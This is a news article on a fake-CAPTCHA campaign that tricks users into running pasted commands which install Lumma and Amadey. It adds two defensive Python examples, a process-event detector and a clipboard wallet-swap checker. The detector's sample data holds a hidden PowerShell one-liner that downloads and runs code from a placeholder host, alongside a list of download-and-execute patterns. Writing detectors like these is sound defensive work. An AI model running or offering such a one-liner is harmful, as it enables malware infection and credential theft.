Malware Campaign Broadens Tactics with Increased Use of Fake CAPTCHAs

The Rise of Malware Delivery Through Fake CAPTCHAs: A New Cyber Threat

In the ever-evolving landscape of cybersecurity, researchers have recently uncovered a concerning trend: a new campaign delivering malware through fake CAPTCHA systems. CAPTCHAs, or Completely Automated Public Turing tests to tell Computers and Humans Apart, are commonly used on websites to differentiate between human users and automated bots. However, cybercriminals are now exploiting users’ instinctive desire to quickly bypass these verification tools, leading to a significant increase in malware distribution.

Understanding the Threat

According to researchers at Kaspersky, a prominent Russian cybersecurity firm, this latest campaign primarily targets users through online advertisements, adult websites, file-sharing services, betting platforms, anime sites, and web applications that monetize traffic. The attackers have refined their methods, expanding their distribution network to reach a broader pool of potential victims. This shift indicates a strategic evolution in their operations, moving beyond previous campaigns that primarily targeted gamers through websites hosting cracked games.

The Mechanics of the Attack

The recent campaign, observed from mid-September to October, employs a deceptive tactic: redirecting users to a seemingly normal CAPTCHA interface. When victims click the familiar “I’m not a robot” button, they unwittingly copy malicious code to their clipboard. Completing the verification steps executes this code, leading to the installation of malware known as Lumma and Amadey.

In some instances, the malicious script downloads and executes an archive containing Lumma, an infostealer that has been available through a malware-as-a-service model on Russian-speaking forums since at least August 2022. Once installed, Lumma searches for files associated with cryptocurrency wallets and attempts to steal them. The malware also extracts cookies and other credentials stored in browsers, including sensitive data from password manager archives.
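The paste-and-run flow described above leaves a recognisable trace on the endpoint: a script interpreter started from the Windows shell (the Run dialog is a child of explorer.exe) whose command line fetches and runs remote content. The following detector is an added example written for this page, not code from the article or from Kaspersky. It assumes Sysmon-style process-creation records with Image, ParentImage and CommandLine fields, and it assumes that the pasted command carries lure wording such as "not a robot"; the sample events, the interpreter list and the keyword lists are all constructed for the demonstration.

```python
"""Flag process-creation events that match the fake-CAPTCHA paste-and-run pattern.

Constructed example (not the article's or Kaspersky's code). Assumes Sysmon-like
records with Image / ParentImage / CommandLine; all sample events are made up.
"""
import re

# Interpreters a pasted one-liner typically hands its payload to (assumption).
INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
                "wscript.exe", "cscript.exe"}

# Download-and-execute primitives that a benign Run-dialog command rarely needs (assumption).
DOWNLOAD_EXEC = re.compile(
    r"(invoke-webrequest|\biwr\b|\bcurl\b|downloadstring|downloadfile|"
    r"invoke-expression|\biex\b|\bhttps?://|-w(indowstyle)?\s+hidden|"
    r"-e(nc|ncodedcommand)?\s)",
    re.IGNORECASE,
)

# Lure wording: the article describes an "I'm not a robot" button; this assumes the
# pasted command carries similar text so the victim believes it is part of verification.
LURE = re.compile(r"not a robot|captcha|verif", re.IGNORECASE)


def _basename(path):
    """Return the lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(event):
    """Return a list of reason strings; an empty list means the event looks benign."""
    reasons = []
    image = _basename(event.get("Image", ""))
    parent = _basename(event.get("ParentImage", ""))
    cmdline = event.get("CommandLine", "")
    if image not in INTERPRETERS:
        return reasons
    if parent == "explorer.exe":
        reasons.append("interpreter launched by explorer.exe (Run dialog / shell)")
    if DOWNLOAD_EXEC.search(cmdline):
        reasons.append("download-and-execute primitive in command line")
    if LURE.search(cmdline):
        reasons.append("CAPTCHA-style lure text in command line")
    # Require the explorer.exe parent plus at least one content indicator, so an admin
    # who simply opens PowerShell from the Start menu is not flagged.
    if parent == "explorer.exe" and len(reasons) >= 2:
        return reasons
    return []


def find_suspicious(events):
    """Map event id -> reasons for every event that trips the rule."""
    hits = {}
    for event in events:
        reasons = score_event(event)
        if reasons:
            hits[event["id"]] = reasons
    return hits


# Constructed sample events; example.invalid is a reserved, non-resolving domain.
SAMPLE_EVENTS = [
    {"id": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell -w hidden "iwr http://example.invalid/x | iex" # I am not a robot'},
    {"id": 2, "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "mshta https://example.invalid/verify"},
    {"id": 3, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell -NoProfile Get-Process"},          # admin at the keyboard
    {"id": 4, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1"},
    {"id": 5, "Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "notepad.exe"},
]

if __name__ == "__main__":
    for event_id, reasons in find_suspicious(SAMPLE_EVENTS).items():
        print(f"event {event_id}: " + "; ".join(reasons))
```

Events 1 and 2 are flagged; the interactive PowerShell session (3), the scheduled-task script (4) and the editor launch (5) are not. In production the same rule is usually expressed in the SIEM's query language, with the explorer.exe parent condition doing most of the work to separate user-pasted commands from automation.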

The Aftermath of Infection

Once the malware has exfiltrated valuable data, it takes a further step by visiting various online stores. This behavior appears to be a tactic to generate additional revenue for the attackers by artificially boosting views of these websites, akin to adware. The dual functionality of Lumma—stealing sensitive information and generating traffic—highlights the sophisticated nature of this cyber threat.

The Role of Amadey

While Lumma has been previously associated with fake CAPTCHA attacks, the introduction of Amadey marks a new chapter in this campaign. Amadey is a botnet that first emerged around 2018 and is currently available for purchase on Russian-speaking hacking forums for approximately $500. This botnet enhances the attackers’ capabilities by downloading several modules designed to steal credentials from popular web browsers, detect cryptocurrency wallet addresses in the clipboard, and replace them with addresses controlled by the attackers. Additionally, one module can take screenshots and, in some cases, download the Remcos remote access tool, granting attackers full control over the victim’s device.
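The clipboard module described above rewrites a wallet address moments after the user copies it, which is a pattern a clipboard monitor can surface. The checker below is an added example written for this page, not code from the article or from Kaspersky. It assumes an agent that records every clipboard write as a timestamp, the writing process and the new text; the address formats are the public Bitcoin legacy, Bitcoin bech32 and Ethereum shapes, the two-second swap window is an assumption, and the sample records (including the process name updater.exe) are constructed.

```python
"""Spot clipper-style wallet-address substitution in a clipboard-change log.

Constructed example (not the article's or Kaspersky's code). Assumes a monitoring
agent that logs every clipboard write; the sample records are made up.
"""
import re

# Public address shapes; a real deployment would add the other assets it cares about.
ADDRESS_PATTERNS = {
    "btc-legacy": re.compile(r"^[13][a-km-zA-HJ-NP-Z1-9]{25,34}$"),
    "btc-bech32": re.compile(r"^bc1[a-z0-9]{39,59}$"),
    "eth": re.compile(r"^0x[a-fA-F0-9]{40}$"),
}

SWAP_WINDOW_SECONDS = 2.0  # assumption: a clipper rewrites the clipboard almost immediately


def address_type(text):
    """Return the address family of text, or None if it is not a wallet address."""
    text = text.strip()
    for name, pattern in ADDRESS_PATTERNS.items():
        if pattern.match(text):
            return name
    return None


def find_swaps(records):
    """records: list of dicts with 'ts' (seconds), 'process', 'text', in time order.

    A swap is an address replaced by a different address of the same family,
    within the window, by a different process than the one the user copied from.
    """
    swaps = []
    for prev, cur in zip(records, records[1:]):
        kind_prev, kind_cur = address_type(prev["text"]), address_type(cur["text"])
        if kind_prev is None or kind_cur is None or kind_prev != kind_cur:
            continue
        if prev["text"].strip() == cur["text"].strip():
            continue                     # same value re-copied, nothing replaced
        if cur["ts"] - prev["ts"] > SWAP_WINDOW_SECONDS:
            continue                     # user plausibly copied a second address later
        if cur["process"] == prev["process"]:
            continue                     # a clipper writes from its own process (assumption)
        swaps.append({"ts": cur["ts"], "process": cur["process"], "kind": kind_cur,
                      "original": prev["text"], "replacement": cur["text"]})
    return swaps


# Constructed records: the user copies an address from the browser and a foreign
# process overwrites it 300 ms later with a different address of the same family.
SAMPLE_RECORDS = [
    {"ts": 100.0, "process": "chrome.exe",  "text": "bc1q" + "a" * 38},
    {"ts": 100.3, "process": "updater.exe", "text": "bc1q" + "b" * 38},
    {"ts": 160.0, "process": "chrome.exe",  "text": "meeting at 3pm"},
    {"ts": 200.0, "process": "notepad.exe", "text": "0x" + "ab" * 20},
    {"ts": 260.0, "process": "chrome.exe",  "text": "0x" + "cd" * 20},  # a minute later, user's own copy
]

if __name__ == "__main__":
    for swap in find_swaps(SAMPLE_RECORDS):
        print(f"{swap['process']} replaced {swap['kind']} address at t={swap['ts']}")
```

Only the second record is reported; the Ethereum addresses copied a minute apart from the user's own applications are treated as ordinary activity. A complementary user-side habit is to compare the first and last characters of a pasted address with the one that was copied before sending funds.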

Geographic Impact and Unknowns

While the full impact of the fake CAPTCHA campaign remains unclear, Kaspersky has identified Brazil, Spain, Italy, and Russia as some of the most frequently affected regions. The anonymity of the internet complicates the attribution of these attacks, leaving researchers uncertain about which hacker groups are behind this malicious campaign.

Conclusion

As cyber threats continue to evolve, the emergence of malware delivered through fake CAPTCHA systems underscores the importance of vigilance among internet users. Understanding the tactics employed by cybercriminals can help individuals and organizations better protect themselves against these sophisticated attacks. As researchers continue to monitor this trend, it is crucial for users to remain cautious, employ robust security measures, and stay informed about the latest developments in cybersecurity.
